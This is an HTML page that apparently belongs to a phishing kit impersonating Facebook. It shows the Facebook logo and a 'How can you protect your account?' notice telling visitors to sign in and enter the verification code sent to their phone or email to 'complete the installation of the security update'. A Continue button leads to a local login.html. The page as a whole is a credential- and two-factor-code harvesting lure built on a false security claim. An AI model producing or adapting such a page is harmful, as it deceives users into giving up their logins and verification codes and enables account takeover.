<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>

<body style="text-align: center; font-family: Segoe UI Historic, Segoe UI, Helvetica, Arial, sans-serif;">
    <div style="width: 100%; display: flex;">
        <img width="55px" style="padding: 15px;" src="acsets/Facebook_Logo_(2019).png" alt="" srcset="">
        <p style=" font-size: x-large;">Facebook</p>
    </div>
    <div style="max-width: 1500px; margin: 0 auto;">
        <div>
            <img width="100%" src="acsets/poggg.jpg" alt="Security Guide">
        </div>
    
        <div style="text-align: center; margin: 20px 0;">
            <h2 style="text-align: center; font-size: 24px; color: #333;">How can you protect your account?</h2>
            <h3 style="text-align: left; font-size: 20px; color: #555;">To keep your account secure, follow these steps:</h3>
            <p style="font-size: large; text-align: left; color: #666; line-height: 1.6;">
                1. Sign in to your account.<br>
                2. Check the verification code sent to your mobile phone or email.<br>
                3. Enter your verification code to complete the installation of the security update.
            </p>
        </div>
    
        <div>
            <a href="login.html" style="display: inline-block; 
                width: 100%; 
                max-width: 1500px; 
                height: 50px; 
                line-height: 50px; 
                text-align: center; 
                text-decoration: none; 
                color: white; 
                background-color: #0866ff; 
                border: 1px solid #0866ff; 
                border-radius: 5px; 
                font-weight: bold; 
                font-size: 16px;">
                Continue
            </a>
        </div>
    </div>    
</body>

</html>